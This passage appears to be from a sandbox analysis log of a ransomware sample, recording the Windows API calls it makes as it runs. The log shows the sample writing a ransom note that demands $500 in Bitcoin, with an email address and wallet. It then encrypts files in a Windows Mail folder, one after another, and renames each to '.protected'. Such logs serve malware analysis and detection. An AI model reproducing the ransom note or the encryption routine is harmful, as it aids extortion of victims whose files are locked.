lpOverlapped=0x0) returned 1 [0085.372] CloseHandle (hObject=0x150) returned 1 [0085.372] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.372] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.372] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt") returned 95 [0085.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.373] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.373] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.373] lstrlenA (lpString="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") returned 684 [0085.373] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.373] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.373] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.373] CloseHandle (hObject=0x14c) returned 1 [0085.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="Windows") returned -1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files") returned -1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files (x86)") returned -1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="$Recycle.bin") returned 1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="System Volume Information") returned -1 [0085.374] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.374] StrStrIW (lpFirst="edb.chk", lpSrch=".protected") returned 0x0 [0085.374] lstrcmpW (lpString1="edb.chk", lpString2="RESTORE_FILES.txt") returned -1 [0085.374] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.374] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.375] StrStrW (lpFirst="edb.chk", lpSrch=".txt") returned 0x0 [0085.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") 
returned 78 [0085.375] StrStrW (lpFirst="edb.chk", lpSrch=".rar") returned 0x0 [0085.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.375] StrStrW (lpFirst="edb.chk", lpSrch=".zip") returned 0x0 [0085.375] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0085.376] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.377] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0085.377] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.377] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.377] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.377] CloseHandle (hObject=0x14c) returned 1 [0085.377] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected") returned 88 [0085.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows 
mail\\edb.chk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk.protected")) returned 1 [0085.378] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="Windows") returned -1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="Program Files") returned -1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="Program Files (x86)") returned -1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="$Recycle.bin") returned 1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="System Volume Information") returned -1 [0085.378] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.378] StrStrIW (lpFirst="edb.log", lpSrch=".protected") returned 0x0 [0085.378] lstrcmpW (lpString1="edb.log", lpString2="RESTORE_FILES.txt") returned -1 [0085.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.379] StrStrW 
(lpFirst="edb.log", lpSrch=".txt") returned 0x0 [0085.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.379] StrStrW (lpFirst="edb.log", lpSrch=".rar") returned 0x0 [0085.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.379] StrStrW (lpFirst="edb.log", lpSrch=".zip") returned 0x0 [0085.379] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.388] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.389] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.389] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.389] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.391] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.391] CloseHandle (hObject=0x14c) returned 1 [0085.391] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected") returned 88 [0085.391] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log.protected")) returned 1 [0085.392] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0085.392] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.392] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0085.392] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0085.392] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.392] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.393] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0085.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.393] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0085.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.393] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0085.393] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.402] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.402] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.403] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.406] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 
[0085.406] CloseHandle (hObject=0x14c) returned 1 [0085.406] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected") returned 93 [0085.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log.protected")) returned 1 [0085.408] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Windows") returned -1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files") returned -1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files (x86)") returned -1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="$Recycle.bin") returned 1 [0085.408] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="System Volume Information") returned -1 [0085.408] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.408] StrStrIW (lpFirst="edbres00001.jrs", lpSrch=".protected") returned 0x0 [0085.408] lstrcmpW (lpString1="edbres00001.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0085.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x30) returned 1 [0085.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.409] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".txt") returned 0x0 [0085.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.409] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".rar") returned 0x0 [0085.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0085.409] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".zip") returned 0x0 [0085.409] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.411] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.411] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.411] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.411] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, 
lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.412] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.413] CloseHandle (hObject=0x14c) returned 1 [0085.420] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected") returned 96 [0085.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.protected")) returned 1 [0085.421] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Windows") returned -1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files") returned -1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files (x86)") returned -1 [0085.421] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="$Recycle.bin") returned 1 [0085.422] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="System Volume Information") returned -1 [0085.422] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.422] StrStrIW (lpFirst="edbres00002.jrs", lpSrch=".protected") returned 0x0 [0085.422] lstrcmpW 
(lpString1="edbres00002.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0085.422] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.422] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.423] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".txt") returned 0x0 [0085.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.423] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".rar") returned 0x0 [0085.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0085.423] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".zip") returned 0x0 [0085.423] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.433] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.433] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.434] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.434] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.436] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.436] CloseHandle (hObject=0x14c) returned 1 [0085.436] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected") returned 96 [0085.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.protected")) returned 1 [0085.438] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="Windows") returned -1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files") returned -1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files (x86)") returned -1 [0085.438] lstrcmpiW (lpString1="oeold.xml", lpString2="$Recycle.bin") returned 1 [0085.438] 